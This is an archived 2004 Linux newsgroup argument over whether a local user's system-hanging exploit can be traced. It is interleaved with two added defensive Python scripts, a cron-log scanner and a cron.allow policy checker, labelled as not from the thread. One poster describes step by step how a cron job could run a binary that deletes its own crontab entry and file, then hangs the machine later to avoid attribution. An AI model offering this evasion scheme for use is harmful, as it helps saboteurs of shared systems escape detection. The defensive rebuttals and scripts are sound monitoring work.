There aren't any timestamps that actually tell you anything.
>
> It would nearly always require the user to stay logged in,
No it wouldn't. Ever heard of a time bomb?
> or it would
> require changes in something (hint-hint) that could be detected via
> timestamps on files (hint-hint).
How exactly does that help if the crontab entry, and the executable are
deleted hours or days before the system crashes?
> Even more damning and easily found
> would be a process started by a user who wasn't logged in at the time
> of the occurrence of the problem itself. For me, that would actually
> make it easier to trace.
I can imagine scheduling a cron job to delete various temporary files, or
to calc and update some statistics for me daily at a time when I'm not
logged in. Just because a user started a job when not logged in doesn't
really indicate anything.
Don't look now but the ability to track down and identify a user who
wants to crash almost any Linux system, seems to have just vanished.
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser localy.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| T.G.Reaper 2004-06-26, 1:48 pm |
| On Tue, 22 Jun 2004 20:34:20 +0000, Jim Richardson wrote:
> I notice you haven't responded with the log entries I requested from
> your "example" DoS, why is that? afraid I can actually tell you what
> acct ran the malware?
Since my machine only has one user, how difficult do you think it is to
tell who caused the crash? If I posted anything you would claim that it
obviously shows that "Reaper" executed the malicious code, but you
would also claim that I just don't know how to read logs and that's why I
can't see it.
>
>
> except of course, that the system logs, are not writable by the normal
> users. So sad, too bad.
Duh. Unfortunately for you, I've already explained that an innocent
looking cron entry that actually loaded the malicious code was deleted
hours or days before the actual system hang. The binary image of
the malicious code was also deleted hours or days before the actual system
hang. The system log entries that might have been written just before the
hang, were never flushed to disk because the system was...well...hung.
IOW the system log doesn't contain any identifying information. All
that is relevant in the cron log is an execution of an innocently named
binary, and a subsequent crontab entry deletion that looks equally
innocuous, both of which happened long before the actual hang
occurred.
>
> and yet, you have failed to provide the log entries requested, what's
> the matter, afraid of the result?
I explained that above. Either explain how it could be done given the
circumstances, or admit that the act would in fact be untraceable.
| |
| Jim Richardson 2004-06-26, 1:49 pm |
| -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On Tue, 22 Jun 2004 20:14:59 -0700,
T.G.Reaper <Reaper@127.0.0.1.Com> wrote:
> On Tue, 22 Jun 2004 20:34:20 +0000, Jim Richardson wrote:
>
>
>
> Since my machine only has one user, how difficult do you think it is
> to tell who caused the crash. If I posted anything you would claim
> that it obviously shows that "Reaper" executed the malicious code, but
> you would also claim that I just don't know how to read logs and
> that's why I can't see it.
>
You made a claim, that the exploit could not be tracked.
You have been shown several examples of ways to track that exploit. Your
response was to natter on about some other exploit code which hasn't
actually been written, but, you assure us, would work as you claim.
Frankly you're batting zero so far.
>
> Duh. Unfortunately for you, I've already explained that an innocent
> looking cron entry that actually loaded the malicious code was deleted
> hours or days before the actual system hang. The binary image of
> the malicious code was also deleted hours or days before the actual system
> hang. The system log entries that might have been written just before the
> hang, were never flushed to disk because the system was...well...hung.
>
> IOW the system log doesn't contain any identifying information. All
> that is relevant in the cron log is an execution of an innocently named
> binary, and a subsequent crontab entry deletion that looks equally
> innocuous, both of which happened long before the actual hang
> occurred.
>
Not relevant to the exploit code you posted. You are moving the
goalposts, again.
>
> I explained that above. Either explain how it could be done given the
> circumstances, or admit that the act would in fact be untraceable.
>
Show me the logs.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
iD8DBQFA2ThRd90bcYOAWPYRArMQAJ0dLAdVC9a7
eRp6XWSEPAZ6BxUangCffmtB
RKq+98S0I2+G+OPgCUyOohI=
=eQge
-----END PGP SIGNATURE-----
--
Jim Richardson http://www.eskimo.com/~warlock
Only wimps use tape backup: _real_ men just upload their important stuff
on ftp, and let the rest of the world mirror it.
-- Linus Torvalds
| |
| T.G.Reaper 2004-06-26, 1:49 pm |
| On Wed, 23 Jun 2004 05:06:16 +0000, Sinister Midget wrote:
>
> A crontab entry can't be deleted until it's implemented or it won't be
> implemented.
Duh.
Example:
Day one: [June 19th 10:00:02]:
Regular user logs in and schedules cron to load and execute
/home/UserName/bin/cleanup.exe, on the 24th day of every month at 3:00:00
hrs.
User logs out at the end of the day normally.
Day two, three and four:
User logs in and out normally.
Day five [ June 24th 03:00:00 ]:
cron loads and executes the malicious /home/UserName/bin/cleanup.exe.
The malicious code just sits idle for an hour or two, then removes the
cron entry that loaded it, and deletes the file:
/home/UserName/bin/cleanup.exe. Then it goes to sleep for about 16 hours.
During day five the malicious user logs in and out as they normally do.
At some point after the malicious user has logged out, the malicious code
which only exists in memory at this point, will choose to actually hang
the system, stopping all logging and everything else...DEAD.
> The crontab will need to be updated and replaced to get rid of the
> evidence. Since the user won't have root's privileges, the time can't be
> altered.
Not necessary.
> During this implementation, there will be entries that will
> identify the user:
>
> 1. running a task without being logged in (points to delayed start of a
> process)
That's not proof of anything, in fact it's not even really suggestive of
malicious behavior.
> 2. a date/timestamp on a crontab in /var/spool/cron that is around the
> time of the catastrophe
It won't be, see example above.
> just for starters.
You haven't actually gotten started yet.
> Unless you want to give the user root's permissions so he/she could
> conveniently change the clock.
It's not necessary to change the clock.
> Now, why not post the logs Jim asked about (numerous times) so we can
> see if you're right or the rest of us are?
Why are you so uncomfortable with using a specific detailed example?
| |
| T.G.Reaper 2004-06-26, 1:49 pm |
| On Wed, 23 Jun 2004 08:04:19 +0000, Jim Richardson wrote:
>
> You made a claim, that the exploit could not be tracked.
Correct.
> You have been shown several examples of ways to track that exploit. Your
> response was to natter on about some other exploit code which hasn't
> actually been written, but, you assure us, would work as you claim.
Okay, you tell me why this example would not work:
Example:
Day one: [June 19th 10:00:02]:
Regular user logs in and schedules cron to load and execute
/home/UserName/bin/cleanup.exe, on the 24th day of every month at 3:00:00
hrs.
User logs out at the end of the day normally.
Day two, three and four:
User logs in and out normally.
Day five [ June 24th 03:00:00 ]:
cron loads and executes the malicious /home/UserName/bin/cleanup.exe.
The malicious code just sits idle for an hour or two, then removes the
cron entry that loaded it, and deletes the file:
/home/UserName/bin/cleanup.exe.
Then it goes to sleep for about 16 hours or so.
During day five the malicious user logs in and out as they normally do.
At some point after the malicious user has logged out, the malicious code
which only exists in memory at this point, will choose to actually hang
the system, stopping all logging and everything else...DEAD.
> Frankly you're batting zero so far.
Then you should be able to easily explain how it would be determined who
was responsible for killing the system in the above example.
> Not relevant to the exploit code you posted. You are moving the
> goalposts, again.
So the ability to track a malicious user depends on the bad people only
running the malicious code exactly as published? Wow, that's really
comforting....NOT.
> Show me the logs.
Why are you so uncomfortable working with a detailed specific example?
If you can explain *clearly* and *reasonably* how you could identify the
malicious user in the example, I'll gladly modify the exploit code to
match the example. Then I'll run it on my system and post all the
logs you want.
| |
| Mart van de Wege 2004-06-26, 1:50 pm |
| "T.G.Reaper" <Reaper@127.0.0.1.Com> writes:
> On Wed, 23 Jun 2004 08:04:19 +0000, Jim Richardson wrote:
>
>
>
> Correct.
>
>
> Okay, you tell me why this example would not work:
>
Easy. See my question below.
> Example:
>
> Day one: [June 19th 10:00:02]:
>
> Regular user logs in and schedules cron to load and execute
> /home/UserName/bin/cleanup.exe, on the 24th day of every month at 3:00:00
> hrs.
>
> User logs out at the end of the day normally.
>
> Day two, three and four:
>
> User logs in and out normally.
>
> Day five [ June 24th 03:00:00 ]:
>
> cron loads and executes the malicious /home/UserName/bin/cleanup.exe.
>
> The malicious code just sits idle for an hour or two, then removes the
> cron entry that loaded it, and deletes the file:
> /home/UserName/bin/cleanup.exe.
>
<snip>
Tell us, oh Master Sysadmin, how do you delete a crontab entry without
leaving traces? Edits and deletes to user crontabs are logged to
syslog, and users can't bypass the normal edit/delete process because
they don't have write/delete access to their crontab in
/var/spool/cron.
So, maybe your little trick makes tracing the culprit a *little* more
difficult, but any sysadmin worth his salt will *still* be able to
find out who crashed his server.
Oh, and if I were to ever find a user misusing his crontab privileges
to run unknown binaries from his /home, I'd have a good talk why this
is a Bad Thing(tm). Perhaps you Windows users are trusting enough to
just let regular users run everything they want, but I like my secure
systems to *stay* secure, thankyouverymuch.
Mart
--
Take it from the staff of a five-cat house: A group of cats is a
"conceit." They'd like to be a "pride" but that would fool no one.
--- Morely Dotes in news.admin.net-abuse.email
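The log trail Mart relies on here (crontab edits and deletes logged to syslog, and cron itself logging every CMD it runs) can be checked mechanically. The following is an added example, not code from the thread or from any cron implementation: it parses Vixie-cron style syslog lines, lists every crontab REPLACE/DELETE, flags any CMD whose program lives outside a set of trusted directories, and reports a DELETE that follows such a CMD by the same user within a few hours, which is exactly the day-five sequence in Reaper's example. The host name, PIDs, user names, paths, the trusted-directory list and the time window are all constructed assumptions.

```python
"""Added example, not code from the thread: scan cron and crontab syslog
lines for the pattern argued over above (a user crontab running an unknown
binary from a home directory, then that crontab being deleted shortly
after). Log lines are constructed in Vixie-cron syslog style; host name,
PIDs, user names and paths are invented sample data."""

import re
from datetime import datetime, timedelta
from typing import Dict, List, Optional

# Syslog timestamps carry no year; the constructed sample is taken as 2004.
ASSUMED_YEAR = 2004

# Locations a cron job is expected to execute programs from (assumption for
# this demo; a real site would derive its own list). Anything else counts as
# an unknown binary.
TRUSTED_PREFIXES = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/")

# A crontab DELETE this soon after a suspicious CMD by the same user is
# reported as the job cleaning up after itself (assumption; tune per site).
CLEANUP_WINDOW = timedelta(hours=6)

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"(?P<prog>crontab|CRON|crond|cron)\[\d+\]: \((?P<user>[^)]+)\) "
    r"(?P<action>[A-Z ]+) \((?P<arg>.*)\)$")


def parse_line(line: str) -> Optional[Dict]:
    """Parse one syslog line from cron or crontab; None for anything else."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    ts = datetime.strptime(f"{ASSUMED_YEAR} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "user": m["user"], "action": m["action"], "arg": m["arg"]}


def is_unknown_binary(cmd: str) -> bool:
    """True when the program a CMD runs lives outside TRUSTED_PREFIXES.
    Only the first word is examined: arguments may legitimately name
    paths under /home (e.g. a find over the user's own files)."""
    words = cmd.split()
    if not words:
        return False
    prog = words[0]
    return prog.startswith("/") and not prog.startswith(TRUSTED_PREFIXES)


def scan_cron_log(lines: List[str]) -> List[Dict]:
    """Return findings in log order: every crontab REPLACE/DELETE (the audit
    trail a sysadmin reads daily), every CMD that runs an unknown binary,
    and a DELETE that follows such a CMD within CLEANUP_WINDOW."""
    findings: List[Dict] = []
    last_suspicious: Dict[str, datetime] = {}   # user -> time of last flagged CMD
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        if ev["action"] in ("REPLACE", "DELETE"):
            findings.append({"kind": "crontab-" + ev["action"].lower(),
                             "user": ev["user"], "ts": ev["ts"]})
        if ev["action"] == "CMD" and is_unknown_binary(ev["arg"]):
            findings.append({"kind": "unknown-binary", "user": ev["user"],
                             "ts": ev["ts"], "cmd": ev["arg"]})
            last_suspicious[ev["user"]] = ev["ts"]
        if ev["action"] == "DELETE" and ev["user"] in last_suspicious:
            gap = ev["ts"] - last_suspicious[ev["user"]]
            if gap <= CLEANUP_WINDOW:
                findings.append({"kind": "self-cleaning-job", "user": ev["user"],
                                 "ts": ev["ts"], "after": gap})
    return findings


# Constructed sample log, following the day-by-day example from the thread.
SAMPLE_LOG = [
    "Jun 19 10:00:02 srv crontab[4021]: (alice) BEGIN EDIT (alice)",
    "Jun 19 10:00:02 srv crontab[4021]: (alice) REPLACE (alice)",
    "Jun 19 10:00:02 srv crontab[4021]: (alice) END EDIT (alice)",
    "Jun 20 02:00:01 srv CRON[4100]: (root) CMD (/usr/sbin/logrotate /etc/logrotate.conf)",
    "Jun 21 08:15:00 srv crontab[4400]: (bob) REPLACE (bob)",
    "Jun 22 01:00:00 srv CRON[4500]: (bob) CMD (/usr/bin/find /home/bob/tmp -mtime +7 -delete)",
    "Jun 24 03:00:00 srv CRON[5120]: (alice) CMD (/home/alice/bin/cleanup.exe)",
    "Jun 24 04:37:11 srv crontab[5134]: (alice) DELETE (alice)",
]

if __name__ == "__main__":
    for f in scan_cron_log(SAMPLE_LOG):
        print(f["ts"], f["kind"], f["user"], f.get("cmd", ""))
```

Two points the sample makes: the REPLACE on day one tells the admin only that a crontab changed, so the crontab in /var/spool/cron still has to be read to see what it schedules; and by the time the job hangs the machine, the CMD line and the DELETE that followed it are already on disk, which is what makes the later hang attributable to a user rather than a "hardware fluke".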
| |
| Jim Richardson 2004-06-26, 1:50 pm |
| -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On Wed, 23 Jun 2004 09:18:59 -0700,
T.G.Reaper <Reaper@127.0.0.1.Com> wrote:
> On Wed, 23 Jun 2004 08:04:19 +0000, Jim Richardson wrote:
>
>
>
> Correct.
>
>
> Okay, you tell me why this example would not work:
>
Now you are changing the goalposts.
Don't you know the difference between exploit, and vulnerability?
The exploit you posted, could easily be tracked.
> Example:
>
> Day one: [June 19th 10:00:02]:
>
> Regular user logs in and schedules cron to load and execute
> /home/UserName/bin/cleanup.exe, on the 24th day of every month at 3:00:00
> hrs.
>
> User logs out at the end of the day normally.
>
> Day two, three and four:
>
> User logs in and out normally.
>
> Day five [ June 24th 03:00:00 ]:
>
> cron loads and executes the malicious /home/UserName/bin/cleanup.exe.
>
> The malicious code just sits idle for an hour or two, then removes the
> cron entry that loaded it, and deletes the file:
> /home/UserName/bin/cleanup.exe.
>
> Then it goes to sleep for about 16 hours or so.
>
> During day five the malicious user logs in and out as they normally do.
>
> At some point after the malicious user has logged out, the malicious code
> which only exists in memory at this point, will choose to actually hang
> the system, stopping all logging and everything else...DEAD.
>
>
> Then you should be able to easily explain how it would be determined who
> was responsible for killing the system in the above example.
>
>
> So the ability to track a malicious user depends on the bad people only
> running the malicious code exactly as published? Wow, that's really
> comforting....NOT.
>
>
> Why are you so uncomfortable working with a detailed specific example?
>
You gave a detailed, specific example, you provided source code. Yet now
you want to back away from that detailed specific example. Why is that?
> If you can explain *clearly* and *reasonably* how you could identify the
> malicious user in the example, I'll gladly modify the exploit code to
> match the example. Then I'll run it on my system and post all the
> logs you want.
>
Stop trying to move the goalposts. Show me the logs I requested from the
first example, we'll go on from there.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
iD8DBQFA2cWNd90bcYOAWPYRAtvaAJ416Fiwj2QX
viXms8JELS4rOeLTkQCfTfLj
7CGFlGJlQOKi9nut6HeUSOY=
=kKW4
-----END PGP SIGNATURE-----
--
Jim Richardson http://www.eskimo.com/~warlock
Here's to girls and gunpowder!
--Gregory Peck
| |
| T.G.Reaper 2004-06-26, 1:52 pm |
| On Wed, 23 Jun 2004 18:34:10 +0000, Jim Richardson wrote:
> On Wed, 23 Jun 2004 09:18:59 -0700,
> T.G.Reaper <Reaper@127.0.0.1.Com> wrote:
>
> Stop trying to move the goalposts. Show me the logs I requested from the
> first example, we'll go on from there.
So...your ability to track down the user who uses a published exploit to
kill a Linux system is COMPLETELY DEPENDENT on the "bad guy," executing
the exploit code exactly as published with no modifications?
I'm sure that all the worlds hackers/crackers/terrorists will be more than
happy to cooperate with you on that.
Do you have a sign posted somewhere saying:
"No modified exploits allowed"
THIS MEANS YOU
ROTFL.
| |
| Peter Köhlmann 2004-06-26, 1:52 pm |
| T.G.Reaper wrote:
> On Wed, 23 Jun 2004 18:34:10 +0000, Jim Richardson wrote:
>
>
>
>
> So...your ability to track down the user who uses a published exploit to
> kill a Linux system is COMPLETELY DEPENDENT on the "bad guy," executing
> the exploit code exactly as published with no modifications?
>
> I'm sure that all the worlds hackers/crackers/terrorists will be more than
> happy to cooperate with you on that.
>
> Do you have a sign posted somewhere saying:
>
> "No modified exploits allowed"
> THIS MEANS YOU
>
> ROTFL.
>
It has to be noticed that TeeGee still fails to supply the requested logs
--
If you had any brains, you'd be dangerous.
| |
| T.G.Reaper 2004-06-26, 1:52 pm |
| On Wed, 23 Jun 2004 20:03:31 +0200, Mart van de Wege wrote:
> "T.G.Reaper" <Reaper@127.0.0.1.Com> writes:
>
> Easy. See my question below.
>
> <snip>
>
> Tell us, oh Master Sysadmin, how do you delete a crontab entry without
> leaving traces? Edits and deletes to user crontabs are logged to
> syslog, and users can't bypass the normal edit/delete process because
> they don't have write/delete access to their crontab in
> /var/spool/cron.
I know, I don't care about the deleted crontab entry. All that shows is
that an entry to run: "/home/UserName/bin/cleanup.exe." was deleted hours
or days before the system crash actually occurred. How useful is that going
to appear to be in determining what happened. Remember all the sysadmin
really knows is that the system crashed, s/he might very well just write
it off as a fluke hardware problem, or power glitch. Leaving the malicious
user free to do it again.
> So, maybe your little trick makes tracing the culprit a *little* more
> difficult, but any sysadmin worth his salt will *still* be able to
> find out who crashed his server.
Except that no one can explain exactly how it would be possible.
| |
|
| T.G.Reaper wrote:
> On Wed, 23 Jun 2004 20:03:31 +0200, Mart van de Wege wrote:
>
>
> I know, I don't care about the deleted crontab entry. All that shows is
> that an entry to run: "/home/UserName/bin/cleanup.exe." was deleted hours
> or days before the system crash actually occurred. How useful is that going
> to appear to be in determining what happened.
Never mind a secure system disallows unauthorized users from using crontab.
From the crontab manpage:
"If the allow file exists, then you must be listed therein in order to
be allowed to use this command. If the allow file does not exist but
the deny file does exist, then you must not be listed in the deny file in
order to use this command. If neither of these files exists, then
depending on site-dependent configuration parameters, only the super
user will be allowed to use this command, or all users will be able to
use this command."
On my system you would not be able to USE cron.
> Remember all the sysadmin
> really knows is that the system crashed, s/he might very well just write
> it off as a fluke hardware problem, or power glitch. Leaving the malicious
> user free to do it again.
>
>
>
> Except that no one can explain exactly how it would be possible.
Since you would not be able to use cron, your method to hide your actions
would not work.
>
>
--
More Mutt nut logic: A person using a Linux embedded device is not a Linux
user!!!
Sorry Mutt nuts, but the only thing different with a Linux embedded device
is the user interface. The user is still using Linux, just with a different
UI.
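The allow/deny rule quoted from the crontab man page above is short but has three branches, and which one applies decides whether a regular user can schedule anything at all. The following is an added example, not code from the thread or from any cron implementation: it turns the quoted rule into a policy function and audits which accounts would be able to install a crontab under an open default, a deny-only file, and an allow-list. The user names and file contents are constructed; whether a particular cron build exempts root from the allow-file check is not stated in the quoted text and is not assumed here.

```python
"""Added example, not code from the thread: the crontab(1) allow/deny rule
quoted above, turned into a checkable policy function plus a small audit
of which accounts end up able to schedule jobs. File contents and user
names below are constructed sample data."""

from typing import Iterable, List, Optional, Set


def parse_access_file(text: Optional[str]) -> Optional[Set[str]]:
    """Parse the body of cron.allow or cron.deny (one user name per line).

    None means the file does not exist, which the rule treats differently
    from an existing but empty file, so None is passed through unchanged.
    """
    if text is None:
        return None
    return {line.strip() for line in text.splitlines() if line.strip()}


def cron_access_allowed(user: str, allow: Optional[Set[str]],
                        deny: Optional[Set[str]],
                        all_users_by_default: bool) -> bool:
    """Decide whether `user` may run crontab, following the quoted man page.

    1. allow file exists      -> user must be listed in it
    2. else deny file exists  -> user must not be listed in it
    3. neither exists         -> site default: root only, or everyone
    Root is not special-cased in steps 1 and 2 because the quoted text does
    not say so (assumption of this demo).
    """
    if allow is not None:
        return user in allow
    if deny is not None:
        return user not in deny
    return user == "root" or all_users_by_default


def users_with_cron_access(users: Iterable[str], allow: Optional[Set[str]],
                           deny: Optional[Set[str]],
                           all_users_by_default: bool) -> List[str]:
    """Audit helper: which of `users` could currently install a crontab."""
    return sorted(u for u in users
                  if cron_access_allowed(u, allow, deny, all_users_by_default))


# Constructed sample: the accounts on a small shared host.
SAMPLE_USERS = ["root", "alice", "bob", "backup"]

# Constructed configurations, from weakest to strictest.
OPEN_SITE = dict(allow=None, deny=None, all_users_by_default=True)
DENY_ONLY = dict(allow=None, deny=parse_access_file("bob\n"),
                 all_users_by_default=True)
LOCKED_DOWN = dict(allow=parse_access_file("root\nbackup\n"), deny=None,
                   all_users_by_default=True)

if __name__ == "__main__":
    for name, cfg in [("open", OPEN_SITE), ("deny-only", DENY_ONLY),
                      ("allow-list", LOCKED_DOWN)]:
        print(f"{name:>10}: {users_with_cron_access(SAMPLE_USERS, **cfg)}")
```

The deny-only configuration is the one that quietly grants access to every account that was not thought of in advance; the allow-list is the "everything not explicitly allowed is denied" posture that the later replies in this thread argue for.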
| |
| T.G.Reaper 2004-06-26, 1:52 pm |
| On Thu, 24 Jun 2004 14:38:56 +0000, Ralph wrote:
> T.G.Reaper wrote:
>
>
> Never mind a secure system disallows unauthorized users from using crontab.
> From the crontab manpage:
>
> If neither of these files exists, then
> depending on site-dependent configuration parameters, only the super
> user will be allowed to use this command, or all users will be able to
> use this command."
>
> On my system you would not be able to USE cron.
Unfortunately YOUR system is NOT the same as every system on the planet.
>
> Since you would not be able to use cron, your method to hide your actions
> would not work.
Did you happen to see the part that said: "depending on site-dependent
configuration parameters...or all users will be able to use this command."
IOW it's quite possible that a regular user would indeed be able to
add/delete cron entries.
| |
| T.G.Reaper 2004-06-26, 1:52 pm |
| On Thu, 24 Jun 2004 16:28:05 +0200, Peter Köhlmann wrote:
> T.G.Reaper wrote:
>
>
> It has to be noticed that TeeGee still fails to supply the requested logs
It should also be noted that NO ONE has explained how the user executing
the malicious code as described in the example could even possibly be
tracked. Including you Peter.
| |
| Peter Köhlmann 2004-06-26, 1:52 pm |
| T.G.Reaper wrote:
> On Thu, 24 Jun 2004 16:28:05 +0200, Peter Köhlmann wrote:
>
>
>
> It should also be noted that NO ONE has explained how the user executing
> the malicious code as described in the example could even possibly be
> tracked. Including you Peter.
>
Supply the logs and stop moving goal-posts
--
Microsoft's Guide To System Design:
Form follows malfunction.
| |
| Peter Köhlmann 2004-06-26, 1:52 pm |
| T.G.Reaper wrote:
> On Thu, 24 Jun 2004 14:38:56 +0000, Ralph wrote:
>
>
>
>
> Unfortunately YOUR system is NOT the same as every system on the planet.
>
On a system accessible via the net, much more stringent measures would be in
place. Certainly not an open crontab.
--
"Windows was created to keep stupid people away from UNIX."
-- Tom Christiansen
| |
| Jim Richardson 2004-06-26, 1:52 pm |
| -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On Thu, 24 Jun 2004 07:05:33 -0700,
T.G.Reaper <Reaper@127.0.0.1.Com> wrote:
> On Wed, 23 Jun 2004 18:34:10 +0000, Jim Richardson wrote:
>
>
>
>
> So...your ability to track down the user who uses a published exploit to
> kill a Linux system is COMPLETELY DEPENDENT on the "bad guy," executing
> the exploit code exactly as published with no modifications?
>
> I'm sure that all the worlds hackers/crackers/terrorists will be more than
> happy to cooperate with you on that.
>
> Do you have a sign posted somewhere saying:
>
> "No modified exploits allowed"
> THIS MEANS YOU
>
You made a claim regarding the posted exploit, a claim which has been
shown to be at least partly in error. (we won't know more, until you
provide the logs requested, which you have refused to do.) Then you
wanted to move the goalposts, and talk about *other* as yet, unwritten
exploits.
Figures. Moving goalposts seems to be your specialty.
OK, write the exploit, make sure you do it right, and I will compile and
run it on one of the machines here. Making sure that it is running a
vulnerable kernel, then I will see if I can find any evidence pointing
to the user it ran under.
Show me the code. Don't wave your hands and say "someone could write
this to do..." write it, and get back to me.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
iD8DBQFA2x8ed90bcYOAWPYRAnpiAJ94AsTAaaHV
RRoqIfZXWjADjCvqPACeInDr
1ZyGCD01hmq0IwRRYut8ou0=
=iOjY
-----END PGP SIGNATURE-----
--
Jim Richardson http://www.eskimo.com/~warlock
The race isn't always to the swift, nor the battle to the strong,
But it's the safest way to bet.
| |
| Jim Richardson 2004-06-26, 1:52 pm |
| -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On Thu, 24 Jun 2004 08:45:21 -0700,
T.G.Reaper <Reaper@127.0.0.1.Com> wrote:
> On Thu, 24 Jun 2004 16:28:05 +0200, Peter Köhlmann wrote:
>
>
>
> It should also be noted that NO ONE has explained how the user executing
> the malicious code as described in the example could even possibly be
> tracked. Including you Peter.
>
yes we have, several times, you even responded to some of them.
That's when you started moving the goalposts (again)
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
iD8DBQFA2x9hd90bcYOAWPYRAtAwAKCnN00sIuQK
bKI/xBaquaDD3iTLRACgyIEe
VTlxIpqEIrWl7X/NOgppypI=
=fq/U
-----END PGP SIGNATURE-----
| |
| Mart van de Wege 2004-06-26, 1:52 pm |
| "T.G.Reaper" <Reaper@127.0.0.1.Com> writes:
> On Wed, 23 Jun 2004 20:03:31 +0200, Mart van de Wege wrote:
<snip even more>
>
>
> I know, I don't care about the deleted crontab entry. All that shows is
> that an entry to run: "/home/UserName/bin/cleanup.exe." was deleted hours
> or days before the system crash actually occurred. How useful is that going
> to appear to be in determining what happened. Remember all the sysadmin
> really knows is that the system crashed, s/he might very well just write
> it off as a fluke hardware problem, or power glitch. Leaving the malicious
> user free to do it again.
>
>
Uh no. The sysadmin also knows that an unknown binary was run from
that crontab, which should set off several alarm bells.
>
> Except that no one can explain exactly how it would be possible.
I can think of a few involved ways of doing this, but the easiest way
is to simply couple cron privileges to careful monitoring of user
crontabs.
Any sysadmin that does *not* inspect the crontabs when he sees in the
logs that they are altered leaves himself open to all sorts of
nasties, the most common one a user misjudging the system load of his
periodic process and it starting to interfere with the regular running
of the system.
IOW, it is fairly hard to slip an unknown binary in a crontab past a
smart sysadmin.
I did bring this up. I did see you snipped it. Why did you do that?
To reiterate: on my systems, I see you add a crontab entry (I read my
logs daily, and if I were a professional sysadmin, I'd read them
hourly). I see this entry runs an unknown binary. I suspend your cron
privileges immediately and ask an explanation. What do you do?
Remember, as per your example, this is *before* you get a chance to
run your malicious code.
Mart
| |
| T.G.Reaper 2004-06-26, 1:52 pm |
| On Thu, 24 Jun 2004 19:07:02 +0000, Jim Richardson wrote:
> OK, write the exploit, make sure you do it right, and I will compile and
> run it on one of the machines here. Making sure that it is running a
> vulnerable kernel, then I will see if I can find any evidence pointing
> to the user it ran under.
>
> Show me the code. Don't wave your hands and say "someone could write
> this to do..." write it, and get back to me.
Okay. I'm building a system from scratch due to a dead motherboard
starting this weekend though, so it may be a while before I can get to
it. After that I'll modify the code to match the example I
gave. Provided of course you agree to allow a regular user account
add/delete cron entries.
| |
| T.G.Reaper 2004-06-26, 1:53 pm |
| On Thu, 24 Jun 2004 23:57:12 +0200, Mart van de Wege wrote:
> "T.G.Reaper" <Reaper@127.0.0.1.Com> writes:
>
> IOW, it is fairly hard to slip an unknown binary in a crontab past a
> smart sysadmin.
>
> I did bring this up. I did see you snipped it. Why did you do that?
Because it assumes that every Linux server on the planet is run by a smart
sysadmin, that's just not true. According to most everyone you have to
run an anti-virus utility on Windows. If you don't your system
will almost immediately be compromised, infected, blown up, and possessed
by goblins. I know for a fact that this little tidbit of "common
knowledge," is not true in every case. I have three clean stable Windows
systems that have been that way for years, and not one of them runs any
type of anti-virus utility. The point is that my systems are run by a
"smart sysadmin," and thus work just fine without AV utils. That is the
exception rather than the rule though, the same holds true for Linux
sysadmins, not all, or even the majority are "smart sysadmins."
| |
| Lee Wei Shun 2004-06-26, 1:53 pm |
| T.G.Reaper wrote:
<snip>
>
> Okay. I'm building a system from scratch due to a dead motherboard
> starting this weekend though, so it may be a while before I can get to
> it. After that I'll modify the code to match the example I
> gave. Provided of course you agree to allow a regular user account
> add/delete cron entries.
>
Observation:
Funny how every time trolls are asked to produce evidence, they have strange
hardware failures. IIRC, EF had the same "problem". Remind me not to get HW
from your suppliers.
Or perhaps both of you have access to the BOFH excuse list?
Cheers,
WS
--
Change to leews to mail.
Linux user #61399
The beginning of the
end
| |
|
| T.G.Reaper wrote:
> On Thu, 24 Jun 2004 14:38:56 +0000, Ralph wrote:
>
>
>
>
> Unfortunately YOUR system is NOT the same as every system on the planet.
So? My system is a single user system. If I want to shut down the system I
have an OFF switch. The ONLY place this bug would be an issue would be on a
system where there were multiple users that had access to the command line
and could either:
Upload code and chmod it to make it executable
-or-
had access to a compiler.
For basic shell accounts, a smart admin would not allow for chmod or access
to a compiler. Your little tricks would not work on any multi user system I
control using what I consider BASIC security best practices.
>
>
> Did you happen to see the part that said: "depending on site-dependent
> configuration parameters...or all users will be able to use this command."
So? /etc/cron.allow and the average user would not. Poof, your method is not
possible. Basic security, everything not explicitly allowed is denied.
>
> IOW it's quite possible that a regular user would indeed be able to
> add/delete cron entries.
Not on a system that can prevent it. But the fact remains, on any system I
administer, you would NOT be able to use cron.
>
>
| |
| Jim Richardson 2004-06-26, 1:53 pm |
| -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On Thu, 24 Jun 2004 16:14:01 -0700,
T.G.Reaper <Reaper@127.0.0.1.Com> wrote:
> On Thu, 24 Jun 2004 19:07:02 +0000, Jim Richardson wrote:
>
> Okay. I'm building a system from scratch due to a dead motherboard
> starting this weekend though, so it may be a while before I can get to
> it. After that I'll modify the code to match the example I
> gave. Provided of course you agree to allow a regular user account to
> add/delete cron entries.
>
As that user, of course. It will be an interesting experiment.
--
Jim Richardson http://www.eskimo.com/~warlock
Payday came and with it beer.
-- Rudyard Kipling
| T.G.Reaper 2004-06-26, 1:53 pm |
On Fri, 25 Jun 2004 09:11:15 +0800, Lee Wei Shun wrote:
> Observation:
>
> Funny how every time trolls are asked to produce evidence, they have strange
> hardware failures.
If you bother to check my previous posts, you will see that I in fact
mentioned the dead motherboard long before this particular thread was even
started.
So what was that about "funny how every time...."?
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser localy.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
